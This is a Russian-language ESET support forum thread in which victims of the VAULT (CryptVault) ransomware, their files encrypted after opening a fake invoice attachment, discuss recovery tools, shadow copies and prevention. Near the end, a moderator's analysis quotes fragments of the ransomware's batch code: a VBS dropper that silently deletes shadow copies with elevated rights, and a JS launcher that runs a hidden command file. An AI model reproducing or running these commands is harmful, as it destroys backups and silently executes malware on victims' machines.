файлы зашифрованы с расширением .vault - Форум технической поддержки ESET NOD32

Сообщений: 10

Баллов: 5

Регистрация: 19.08.2015

Размещено 21.08.2015 17:15:09

Цитата
santy написал: pubring.gpg обычно не перезаписывается мусором, и не удаляется. а вот secring.gpg по алгоритму прежде чем удалить, забивают полезную инфу мусором.

Ладно, пойду узнаю сколько стоит это все восстановить....

Сообщений: 17962

Баллов: 14369

Регистрация: 16.03.2010

Размещено 24.08.2015 17:10:01

по мотивам беседы с Оксаной.

Ищут пожарные, ищет милиция...Ищут давно, Но не могут найти..." (с), С.Маршак.

Очередная активность вулкана по имени ВАУЛТ вновь накрыла своей электронной волной беспечных пользователей, которые уютно устроились у монитора, принимая извергаемый сетевой "пепел" за манну небесную.

восстановить утраченные в результате внезапной атаки (а так же отсутствия архивных и теневых копий) файлы крайне сложно, во-первых, в силу их шифрования, во-вторых, тщательной зачистки оригинальных документов после удаления.

для проверки возможности восстановления удаленных документов после завершения процесса шифрования использовались несколько инструментов:

getdataback,
r-studio,
ontrack easy recovery,
hetman partition recovery,
testdisk,
winhex

для теста использовались несколько папок с документами:
doc, xls, pdf, jpg, rtf, txt, rar

не ставил цели сравнить данные инструменты, кто лучше, быстрее и больше восстановит документов.
надо было просто посмотреть что подобные инструменты могут что-то восстановить после целенаправленного шифрования и удаления документов.
В случае с ВАУЛТОМ цель не достигнута. документов восстановлено минимальное количество, а след секретного ключа (secring.gpg) не найден.

поиски в winhex по известным hex (9501D804558F43D6010400BA49F79C06, 9501D804558F3209010400BE8B3CB164, 9501D80455A4EE32010400B53F95F674), и символьным (-----BEGIN PGP PRIVATE KEY BLOCK-----,-----END PGP PRIVATE KEY BLOCK-----) сигнатурам не дали результат.

отсюда вывод: надежда на восстановление документов специализированными инструментами крайне мала, после того как "их санкции порвали в клочья нашу экономику"

отсюда другая надежда: на превентивную защиту от запуска шифраторов. например, Cryptoprevent, а так же на создание защищенных разделов для документов с помощью HIPS.

(с), chklst.ru

Изменено: santy - 04.06.2016 18:07:56

[ Как создать образ автозапуска? ]

Сообщений: 1

Регистрация: 24.08.2015

Размещено 24.08.2015 23:06:24

Доброй ночи!

Схватил VAULT 21.08.15г с письмом на mail.с архивом ZIP ,типо с счетом . испробовал все!! В итоге воспользовался восстановкой потерянных данных :Компьютер- Рабочий Стол- папка с доками- восстаовить прежнюю версию. Воссстановилось все! Все работает . Дублирующие файлы формата VAULT отсортировал по типу и удалил.

Сообщений: 5198

Баллов: 4168

Регистрация: 12.05.2010

Размещено 25.08.2015 12:56:43

Виктор, поздравляю, зачастую, точки восстановления тоже затираются, так что Вам повезло

ESET Technical Support

Сообщений: 1

Регистрация: 31.08.2015

Размещено 31.08.2015 15:50:24

Добрый день! К сожалению, столкнулся с такой же незадачей: сотрудница запустила вирус на своей машине и "зашифровала", естественно крайне важную и необходимую, информацию. По дате отобрал файлы, какие смог найти на компьютере. Отправил на почту santy, указанную выше. Буду очень признателен, если найдется время проверить архив и возможность восстановления информации. Заранее спасибо!

Сообщений: 17962

Баллов: 14369

Регистрация: 16.03.2010

Размещено 01.09.2015 05:35:30

Константин Гончаров,
ответил в почту.
опыт показывает за последние полтора года, что пост_реакция часто не успевает за новым ходом мошенников, потому надо перестраивать работу в направлении реализации превентивных мер: настройка локальных политик, создание правил ХИПС, регулярного создания архивных и теневых копий документов, доведения до пользователей меры опасности при работе в сети с электронной почтой и браузерами.

Изменено: santy - 04.06.2016 17:32:48

[ Как создать образ автозапуска? ]

Сообщений: 3

Баллов: 1

Регистрация: 28.10.2015

Размещено 28.10.2015 13:54:09

Добрый день!
На работе словли эту напасть. Обидно, что за два дня до этого активировали купленную лицензию на SMART SECURITY, в замен Каспера (который, если верить сети, эту гадость ловит:(). Маил письмо пропустил, хотя попытку переслать это письмо мне пресек. Антивирус тоже сфилонил.

Шифратор отработал, ключ потер. Но теневые копии нашлись через ShadowExplorer (хотя в свойствах файлов Предыдущих версий уже не было) - спасибо Вам за наводку.

Посмотрел отчет, как отработал Esset (скрин прилагаю) - отловил KillBackup, Filecoder, Runner.BC (ну, хоть за это большое спасибо ему). Хотя непонятно, он его отловил, но как-то частично - более 15 000 документов и картинок зашифровано, ключ потерт. Фото тер по непонятному принципу - т.е. потер, но не все.

Прикрепленные файлы

EssetSS8.png (163.36 КБ)

Изменено: Станислав Перевозников - 04.06.2016 18:07:56

Сообщений: 17962

Баллов: 14369

Регистрация: 16.03.2010

Размещено 28.10.2015 14:50:33

Станислав,
если не трудно, добавьте лог журнала обнаружения угроз.
судя по рисунку, ESET прибил скриптик vbs, который удаляет теневые копии, возможно до его запуска, потому теневые копии сохранились

судя по коду шифратора так и есть.

Код
echo Set objShell = CreateObject^("Shell.Application"^) > "%temp%\59665d79.vbs" echo Set objWshShell = WScript.CreateObject^("WScript.Shell"^) >> "%temp%\59665d79.vbs" echo Set objWshProcessEnv = objWshShell.Environment^("PROCESS"^) >> "%temp%\59665d79.vbs" echo objShell.ShellExecute "wmic.exe", "shadowcopy delete /nointeractive", "", "runas", 0 >> "%temp%\59665d79.vbs"

Код

echo Set objShell = CreateObject^("Shell.Application"^) > "%temp%\59665d79.vbs"
echo Set objWshShell = WScript.CreateObject^("WScript.Shell"^) >> "%temp%\59665d79.vbs"
echo Set objWshProcessEnv = objWshShell.Environment^("PROCESS"^) >> "%temp%\59665d79.vbs"
echo objShell.ShellExecute "wmic.exe", "shadowcopy delete /nointeractive", "", "runas", 0 >> "%temp%\59665d79.vbs"

Изменено: santy - 04.06.2016 18:07:56

[ Как создать образ автозапуска? ]

Сообщений: 3

Баллов: 1

Регистрация: 28.10.2015

Размещено 28.10.2015 14:56:14

Цитата
santy написал: Станислав, если не трудно, добавьте лог журнала обнаружения угроз. судя по рисунку, ESET прибил скриптик vbs, который удаляет теневые копии, возможно до его запуска, потому теневые копии сохранились

Но, частично он их испортил - тк в свойствах документа версий не было, только через прогу нашлись.

Прикрепленные файлы

esset_export.txt (801 Б)

Изменено: Станислав Перевозников - 04.06.2016 18:07:56

Сообщений: 17962

Баллов: 14369

Регистрация: 16.03.2010

Размещено 28.10.2015 15:10:09

27.10.2015 11:15:29 Защита в режиме реального времени файл C:\Users\23\AppData\Local\Temp\27ddf88e.js BAT/Filecoder.AG троянская программа очищен удалением - изолирован 23-ПК\23 Событие произошло в новом файле, созданном следующим приложением: C:\Windows\System32\cmd.exe.

Цитата
echo var cdp="%%TEMP%%\\05542988.cmd";var WshShell=CreateObject("WScript.Shell");cdp=WshShell.ExpandEnvironmentStrings(cdp);function CreateObject(fq){return new ActiveXObject(fq)}function xx(cdp){WshShell.Run(cdp,0,0);}xx(''+cdp+'');> "%temp%\27ddf88e.js"

этот скриптик, скорее всего уже после запуска был удален. здесь удаление файла не повлияло на процесс шифрования.

Изменено: santy - 04.06.2016 18:08:54

[ Как создать образ автозапуска? ]

файлы зашифрованы с расширением .vault , bat encoder /CryptVault

Ответы